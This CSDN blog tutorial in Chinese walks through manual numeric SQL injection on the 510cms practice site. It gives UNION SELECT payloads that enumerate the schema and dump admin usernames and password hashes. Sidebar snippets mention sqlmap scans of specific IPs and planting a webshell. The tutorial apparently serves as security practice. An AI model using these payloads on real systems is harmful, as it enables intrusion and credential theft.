SQL注入(一):www.510cms.net --- 数字类型注入

最新推荐文章于 2022-04-14 15:27:59 发布
最新推荐文章于 2022-04-14 15:27:59 发布
阅读量1k 收藏 5
点赞数
分类专栏: pikachu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45273343/article/details/102669131
版权 
一、查找是否存在SQL注入;
查找的方法:
1、在存在 id 的后面 加 '  看是否存在报错的结果;
2、用减法进行操作, id=27 --- id=28-1   显示的结果都一样;不能用 + 
3、在id=27 后面加  and 1=1  两个结果都是真的,所以显示的内容 正常;
  在id=27 后面加  and 1=2   前面的结果显示为真,后面的结果显示为假,所以最后显示的内容 不正常;
  
二、通过查找存在SQL注入,所以进行查找该网址的字段:
SQL命令:
在id=27 后面加 order by 1;
             order by 2;
             order by 3;
           直到报错位置,如果在3时,报错,则有2个字段;
           
三、进行占位:
union联合查询中,前面的查询结果和后面的查询结果都为真的,则都会显示。如果前面的查询结果是假的,则只会显示后面的查询结果;
SQL命令:
在id=27 后加 and 1=2 union select 1,2,3,4
在网页上面会显示 3 ,则3就占位成功;

四、查询数据库:
SQL命令:
在id=27 后加 and 1=2 union select 1,2,database(),4
在网页上面就会显示数据库名称;        510cms

五、查询数据表:
SQL命令:
在id=27 后加 and 1=2 union select 1,2,TABLE_NAME,4 from information_schema.TABLES where TABLE_SCHEMA="510cms"
在网页上面就会显示数据表名称;       510_admin

六、查询数据列:(字段)
SQL命令:
在id=27 后加 and 1=2 union select 1,2,COLUMN_NAME,4 from information_schema.COLUMNS where TABLE_NAME="510_admin"LIMIT 2,1  --- (从0开始,记数,,,实则有4个字段(是从1开始记数)但是显示是按代码中的数列写01 - 11 - 21   后面是能是 1 否则显示不正常)                          

七、查询显示 账户,密码:
SQL命令:
在id=27 后加 and 1=2 union select 1,2,concat(name,passwd),4 from 510_admin             
在网页显示 账号,密码(MD5 加密,H5 加密)
天威一号
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
510cms漏洞练习
weixin_56709770的博客
04-17 2247
510cms漏洞练习
510cms网站渗透测试
AmeV_ll的博客
01-23 1659
利用漏洞进行攻击分为漏洞挖掘、漏洞分析和漏洞利用三个步骤。漏洞挖掘是其他两个步骤的前提和基础,所以对于网络的攻防具有重要的意义。漏洞挖掘,顾名思义就是寻找漏洞,主要是通过综合应用各种技术和工具,尽可能地找出软件中的潜在漏洞,然而这并非一件很容易的事情,在很大程度上依赖于个人经验。根据分析对象的不同,漏洞挖掘技术可以分为基于源码的漏洞挖掘技术和基于目标代码的漏洞挖掘技术。
SQL注入之Bool盲注(510cms
qq_45775897的博客
01-05 2868
SQL注入之get可以参考: https://blog.csdn.net/qq_45775897/article/details/122332051 一、查找是否存在SQL注入注入点) 以510企业网站为例: 这里以漏洞参数id为例 用?id=1和id=1'进行测试,前提能够正常显示。 在?id=1后面加上and 1=1两个结果都是真的,所以正常输出; 后面加上and 1=2如果正常输出,说明前后都是真的,则表示是字符型。反之是数值型 eg: http://IP地址(域名)/news.php?cid=&
510cms进行渗透测试,找到其中的3个flag
Alashan12的博客
04-08 4275
拿到网站 简单观察后发现url区域存在传参 简单测试找到存在注入的界面(此网站多处网址存在注入) 这里我们通过输入一个单引号找到“企业介绍”—>“企业文化”界面存在注入 我们针对此界面(180.76.226.182/about.php?listid=6)使用sqlmap进行爆破 sqlmap -u 180.76.226.182/about.php?listid=6 --current-db 爆当前数据库名 得到数据库名为“510cms” 然后指定该数据库...
510cms企业网站系统
04-30
510cms企业网站系统源码,以PHP+MYSQL+smarty开发的企业网站,可供大家学习交流。 mysql需自己导入没有写安装程序! 后台地址为admin/login.php 账号和密码都为admin
SQL注入之get(510cms
qq_45775897的博客
01-05 1651
一、查找是否存在SQL注入注入点) 以510企业网站为例: 这里以漏洞参数id为例 用?id=1和id=1'进行测试,前提能够正常显示。 在?id=1后面加上and 1=1两个结果都是真的,所以正常输出; 后面加上and 1=2如果正常输出,说明前后都是真的,则表示是字符型。反之是数值型 eg: http://IP地址(域名)/news.php?cid=&listid=&newsid=24 and 1=1 二、查找有几列(字段) 后面加上order by数字即按第几列排序,从而得出有多
思乐CMS(SLCMS) 3.0.zip
05-25
思乐CMS(SLCMS)算是asp.net版...比防注入还严格,防注入一般只验证是否含有特殊的那些字符串,我们是直接限定了参数类型,如直接限定某个参数必须为数字! 无上限在线人数支持 这个不是绝对的,但系统资源的消耗是确是很少
PlugNT开源CMS 4.7.rar
05-25
PlugNT CMS,一款免费开源内容管理系统,PlugNT系统组成部分之一,是一个功能强大、操作人性化、搜索引擎优化、高效性、安全性、扩展性强的Web系统,是定位于中高端市场的CMS内容管理系统,能够以最低的成本、最少的...
奥硕图王CMS管理系统 v1.3.rar
07-08
1、增加全站SQL防注入功能,可有效阻止任何对数据库非法注入代码,保障系统更安全稳定运行。 2、新增一套dapic模板在skin目录下,直接登录系统后台添加即可。 后台管理账号和密码 admin/admin
国微CMS部队门户系统(部队网站系统)-PHP
06-21
国微软件是是国内CMS著名品牌商,提供主流的PHP+mysql平台。提供的方案包括政府、高校、企业、部队等。 部队门户系统功能如下: 1、支持使用linux操作系统进行部署,同时也支持windows部署; 2、支持动静态分离部署;即数据库和程序可以物理格局服务器,访问页在前端服务器。 3、 提供文章、图片、视频、下载、信息公开、领导信箱、表单系统、广告模块、在线访谈、民意征集、在线调查、手机短信、通信录、数据备份、搜索模块、单网页、站群系统、专题模块、数据推送等相关必要模块。 4、具备强健的权限体系,分别支持角色和个人设置各个模块的权限,权限可以细化到文章栏目管理,支持个人可以管理不同栏目;支持多级审核。支持无限创建角色和角色组,可将线下的组织架构体系转移到线上;须支持用excel一键导入用户。 5、支持对栏目和内容一键设置局域网访问功能,栏目和内容访问可以设置IP段访问(如只允许校内访问)、同时栏目访问需要设置密码访问功能。 6、提供强大的统计体系:支持按用户发稿排名体系;可以按年、月、日以及时间段统计;支持每个子站的用户发稿统计;支持子站推送数据给主站的稿件统计;统计的内容可以用excel导出;统计可以按作者和发布人分别统计。 7、表单系统可以自定义字段,每个字段可以设置为列表和查询;数据可以导入导出excel;各种报名可以配套手机短信。 8、支持系统设置IP 白名单和黑名单;支持后台登陆登陆的ip控制、须支持栏目可以设置密码访问、支持后台登陆错误次数限制与锁定、可以修改后台登陆地址。 9、系统支持一键批量替换敏感词;在特殊紧急情况下,可以在后台快速替换系统中已有的敏感词语、姓名、句子。 10、支持强大的可视化的标签体系,管理员可以在前台任何页面通过可视化标签,调用出系统的任何功能,如图片、幻灯片、内容、领导信箱、表单、在线访谈、在线调查等;每个功能可以选择数十种样式。让系统极其易用; 11、支持前台内容操作模式,所有栏目管理员在当前页面,都可以管理(包括发布、编辑、数据推送)自己所负责的栏目内容,无需进入后台和会员中心; 12、微信公众号二次开发系统支持绑定微信公众号;支持站群数据推送给公众号显示,节约老师时间;后续新增的公众号功能免费升级; 14、系统支持核心文件校验功能。 15、发布内容可以修改时间,支持定时发布。 16、支持误删栏目一键恢复。 2020003升级: 解决PHP7.X环境的安装中重要兼容问题。 加入了留言板等相关模块。
CMSC-510机器学习的正规化方法:VCU
02-17
CMSC-510机器学习的正规化方法 VCU:2019年秋季 课程项目 教授:汤姆·阿罗兹博士
Cms v5.2.5源码带文档2012711
07-11
是一套个人独立开发的内容管理系统,其前身为jbsitecms采用WEB2.0设计理念、 无刷新更新页面,前台模板自定义   .NET 版本:VS2008(.NET2.0)+Access/MSSQL JumbotCms从5.0开始增加的模块有:产品、在线订购。同时取消的模块如下:采集、群组、 邮件订阅、工具箱(包含火车时刻表、公交路线、手机归属地、身份证归属地)、Theme主题: 可根据后台设置的值自动给网站配色、调整尺寸)。 升级日志: 将博cms通用版从5.2开始.NET框架由2.0升级至3.5;增加了5个第三方登录的接口:新浪微博 、QQ账号、人人网账号、百度账号、开心网账号;另外调整了5.1.2版本的一些小功能。 提示: 按照安装步骤操作即可 更新日志 2012-07-06(V5.2.5) 1.修复新浪微博id溢出的问题 2.对自动截取的简介进行多换行符、多空格及特殊符号的过滤处理 3.修复修改频道后内容的链接被清空的BUG(V5.1.2产生) 4.后台补上用户评论管理的功能 5.修复chrome裁剪图片不透明的问题 6.删除了2个第三方登录的接口:百度账号、开心网账号 7.其他几处小地方,并将此版本作为5.x系列最后一版
MF00483-网站信息管理源码CMS.zip
08-14
ASP.NET企业网站信息管理系统源码 CMS源码 注意:不带技术支持,有帮助文件,虚拟商品,发货不退,看好再拍。 开发语言 : C# 数据库 : SQL2012 开发工具 : VS2012 源码类型 : WebForm 一、源码特点  采用典型的三...
淘特Asp Cms 6.5.rar
05-25
同时我们系统已经加入了防Sql注入、跨站提交、文件上传严格过滤等设置,保证系统的安全稳定... 淘特Asp Cms 6.5 更新说明: 1、增加KindEditor可视化编辑器,可批量上传图片 2、修改添加文章操作方式,更加直观...
Espcms v5暴力破解key来实现sql注入
收集盒 Book box
04-20 1524
发布时间:2013-04-01  关键词:Espcms sql注入 注入漏洞 漏洞分析: interface\membermain.php 第 33行: $db_sql = "SELECT * FROM $db_table1 LEFT JOIN $db_table2 ON a.userid = b.userid  WHERE a.userid = $this->ec_memb
510cms,挂马连接,udf提权
m0_52341820的博客
04-14 777
1、510cms(http://159.75.16.25:8887/)使用手工注入挂下一句话木马。操作步骤配截图。 ①对带具有测试功能的url进行sqlmap扫描 得到数据库版本信息 ②以此对所有数据库、当前所用数据库、表、字段进行扫描。 ③使用sqlmap对该url进行手工注入挂马 出现文件成功上传的链接,说明木马手工挂载成功 第一个链接是上传的连接(在这个页面可以上传木马了),第二个链接是挂的马 通过-ls命令可以查看挂入的木马 ④将上
Cause: java.sql.SQLIntegrityConstraintViolationException: ORA-01400: 无法将 NULL 插入
最新发布
08-24
Cause: java.sql.SQLIntegrityConstraintViolationException: ORA-01400: 无法将 NULL 插入是指在向数据库插入数据时,违反了非空约束,即将 NULL 值插入了不允许为空的列中。 这通常发生在插入或更新数据时,对某个列进行了赋值为 NULL 的操作,而该列在数据库中被定义为不允许为空。这样的操作会触发数据库引发 SQLIntegrityConstraintViolationException 异常。这个异常信息中包含了具体的错误信息 ORA-01400。在这种情况下,你需要检查你的代码或者数据库表结构,确保在插入数据时不会将 NULL 值赋值给不允许为空的列。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [java.sql.SQLIntegrityConstraintViolationException](https://blog.csdn.net/zhao2chen3/article/details/122875564)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [Cause: java.sql.SQLIntegrityConstraintViolationException: Column ‘businessName‘ cannot be null](https://blog.csdn.net/Silly011/article/details/119580160)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Caused by: java.sql.SQLIntegrityConstraintViolationException: Cannot delete or update a parent row:](https://download.csdn.net/download/weixin_38500572/13684759)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

天威一号

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值